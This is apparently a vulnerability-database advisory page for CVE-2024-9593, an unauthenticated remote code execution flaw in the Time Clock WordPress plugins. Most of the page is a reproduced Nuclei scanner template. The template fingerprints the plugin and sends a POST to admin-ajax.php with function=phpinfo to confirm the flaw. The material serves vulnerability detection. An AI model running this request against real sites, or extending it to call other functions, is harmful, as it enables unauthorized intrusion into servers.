CVE-2024-9593: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Time Clock | POC: 已公开

漏洞描述

The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.

PoC代码[已公开]

id: CVE-2024-9593

info:
  name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
  author: s4e-io
  severity: high
  description: |
    The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9593
    - https://github.com/RandomRobbieBF/CVE-2024-9593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2024-9593
    cwe-id: CWE-94
    epss-score: 0.71019
    epss-percentile: 0.98665
  metadata:
    max-request: 2
    verified: true
    vendor: scott_paterson
    product: time-clock & time-clock-pro
    framework: wordpress
    fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
  tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/time-clock")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 490a0046304402200bf613798a0e2bc3c96dea4129893b13024d05601a1515bdaf7ae5b3310ee3fe02202278e2af936cbd2421ef1695ca36fcd433ab9b9b528513a8f78ee6498c666212:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-9593.yaml